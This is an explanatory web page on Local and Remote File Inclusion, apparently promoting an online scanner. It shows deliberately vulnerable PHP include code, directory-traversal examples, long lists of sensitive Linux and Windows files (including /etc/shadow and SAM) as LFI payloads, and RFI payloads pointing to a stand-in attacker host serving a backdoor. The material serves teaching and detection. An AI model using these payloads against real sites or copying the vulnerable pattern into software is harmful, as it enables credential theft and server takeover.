File Inclusion Vulnerability

There are two primary types of File Inclusion Vulnerabilities: Local File Inclusion (LFI) and Remote File Inclusion (RFI).

Local File Inclusion (LFI)

Local File Inclusion occurs when an attacker is able to include files that exist on the local server. This is often done by specifying the path to the file in the web application, such as "/includes/file.php". If the web application does not properly sanitize user input, an attacker can manipulate the path and include other sensitive files on the server.

LFI is a vulnerability that allows an attacker to include files from the local system on the webserver. LFI can be used to read local files on the servers that cause many risks.

The exploitation phase of an LFI vulnerability can be very dangerous. If the attacker can execute code on the webserver, they can take over the entire system.

Remote File Inclusion (RFI)

Remote File Inclusion is a vulnerability that occurs when an attacker is able to include files that exist on a remote server. This is often done by specifying the URL to the file in the web application, such as "http://attacker.com/includes/file.php". If the web application does not properly sanitize user input, an attacker can manipulate the URL and include other sensitive files on the server.

RFI is a vulnerability that allows an attacker to include files from remote systems into the vulnerable site. Attackers use this vulnerability to inject their own code into websites which gives them access to restricted resources or complete control over the target website.

Sample Local File Inclusion (LFI) Vulnerable Code

Sample Vulnerable Code

page.php

<--!?php include $_GET['inc'];--!>

about.php

Hello, this is a simple about us content

contact.php

This page contains a sample contact form.

If you visit page.php?inc=about, then page content will be `Hello, this is a simple about us content`

If you visit page.php?inc=contact, then page content will be `This page contains a sample contact form.`

But what about if you visit a page like that page.php?inc=../../../../secretpath/secretfile

PHP will try to include a secretfile in the secretpath. This path can be etc/passwd in Linux server, \WINDOWS\win.ini in the Windows server.

Sample Remote File Inclusion (RFI) Vulnerable Code

The process is much the same, but file is reading from a remote location with its contents in the remote file inclusion.

page.php

<--!?php echo get_content_of_the_file($_GET['inc']);--!>

How to scan (detect) file inclusion vulnerabilities?

The easiest way to scan is using an online file inclusion vulnerability scanner. S4E file inclusion vulnerability scanner scan for both LFI and RFI.

However, if you want to do it manually, here are some tools that can be used to detect LFI/RFI.

• LFISuite
• LFIFreak
• w3af
• fimap

Payload for LFI vulnerability

General Payloads for Linux OS:

• /etc/passwd
• /etc/shadow
• /etc/aliases
• /etc/anacrontab
• /etc/apache2/apache2.conf
• /etc/apache2/httpd.conf
• /etc/at.allow
• /etc/at.deny
• /etc/bashrc
• /etc/bootptab
• /etc/chrootUsers
• /etc/chttp.conf
• /etc/cron.allow
• /etc/cron.deny
• /etc/crontab
• /etc/cups/cupsd.conf
• /etc/exports
• /etc/fstab
• /etc/ftpaccess
• /etc/ftpchroot
• /etc/ftphosts
• /etc/groups
• /etc/grub.conf
• /etc/hosts
• /etc/hosts.allow
• /etc/hosts.deny
• /etc/httpd/access.conf
• /etc/httpd/conf/httpd.conf
• /etc/httpd/httpd.conf
• /etc/httpd/logs/access_log
• /etc/httpd/logs/access.log
• /etc/httpd/logs/error_log
• /etc/httpd/logs/error.log
• /etc/httpd/php.ini
• /etc/httpd/srm.conf
• /etc/inetd.conf
• /etc/inittab
• /etc/issue
• /etc/lighttpd.conf
• /etc/lilo.conf
• /etc/logrotate.d/ftp
• /etc/logrotate.d/proftpd
• /etc/logrotate.d/vsftpd.log
• /etc/lsb-release
• /etc/motd
• /etc/modules.conf
• /etc/motd
• /etc/mtab
• /etc/my.cnf
• /etc/my.conf
• /etc/mysql/my.cnf
• /etc/network/interfaces

General Payloads for Windows OS

• \boot.ini
• \WINDOWS\win.ini
• \WINNT\win.ini
• \WINDOWS\Repair\SAM
• \WINDOWS\php.ini
• \WINDOWS\system32\drivers\etc\hosts
• \WINNT\php.ini
• \php\php.ini
• \php5\php.ini
• \php4\php.ini
• \apache\php\php.ini
• \xampp\apache\bin\php.ini
• \home2\bin\stable\apache\php.ini
• \home\bin\stable\apache\php.ini
• \Program Files\Apache Group\Apache\logs\access.log
• \Program Files\Apache Group\Apache\logs\error.log
• \Program Files\Apache Group\Apache\conf\httpd.conf
• \Program Files\Apache Group\Apache2\conf\httpd.conf
• \Program Files\xampp\apache\conf\httpd.conf
• \Program Files\FileZilla Server\FileZilla Server.xml
• \Program Files (x86)\Apache Group\Apache\logs\access.log
• \Program Files (x86)\Apache Group\Apache\logs\error.log
• \Program Files (x86)\Apache Group\Apache\conf\httpd.conf
• \Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
• \Program Files (x86)\xampp\apache\conf\httpd.conf
• \Program Files (x86)\FileZilla Server\FileZilla Server.xml
• \AppServ\MySQL\data\mysql\user.MYD

General Payloads for Local Critical Files:

• /var/apache2/config.inc
• /var/apache/logs/access_log
• /var/apache/logs/error_log
• /var/cpanel/cpanel.config
• /var/lib/mysql/my.cnf
• /var/lib/mysql/mysql/user.MYD
• /var/local/www/conf/php.ini
• /var/log/apache2/access_log
• /var/log/apache2/access.log
• /var/log/apache2/error_log
• /var/log/apache2/error.log
• /var/log/apache/access_log
• /var/log/apache/access.log
• /var/log/apache/error_log
• /var/log/apache/error.log
• /var/log/apache-ssl/access.log
• /var/log/apache-ssl/error.log
• /var/log/auth.log
• C:/home2/bin/stable/apache/php.ini
• C:/home/bin/stable/apache/php.ini
• C:/inetpub/logs/logfiles
• C:/inetpub/wwwroot/global.asa
• C:/inetpub/wwwroot/index.asp
• C:/inetpub/wwwroot/web.config
• C:/log/access.log
• C:/log/access_log
• C:/log/error.log
• C:/log/error_log
• C:/log/httpd/access_log
• C:/log/httpd/error_log
• C:/logs/access.log
• C:/logs/access_log
• C:/logs/error.log
• C:/logs/error_log
• C:/logs/httpd/access_log
• C:/logs/httpd/error_log
• C:/MININT/SMSOSD/OSDLOGS/VARIABLES.DAT
• C:/mysql/bin/my.ini
• C:/mysql/data/hostname.err
• C:/mysql/data/mysql.err
• C:/mysql/data/mysql.log
• C:/mysql/my.cnf
• C:/mysql/my.ini
• C:\nginx-1.7.4\conf\nginx.conf

Payload for RFI vulnerability:

• http://attacker.com/backdoor.php
• \\attacker.com\shared\backdoor.php

How dangerous is LFI? What is the risk of LFI?

An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the webserver. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS). Typically, LFI occurs when an application uses the path to a file as input. If the application treats this input as trusted, a local file may be used in the include statement.

One way an attacker can execute code on the webserver is by uploading a file with malicious code to the server and then including it in the application. The attacker may also be able to inject code into the pages that are being served by the webserver. This could allow the attacker to steal information or even take control of the system. This online LFI vulnerability scanner will search for online vulnerabilities on the website, and if the site is vulnerable to this type of attack, it can be used to read local files on the server.

How dangerous is RFI? What is the risk of RFI?

Remote File Inclusion (RFI) is an attack that allows an attacker to include a file from a remote server. This can be used to execute code on the server or even take control of the server. The attacker may also be able to inject code into the pages that are being served by the server. This could allow the attacker to steal information or even take control of the system.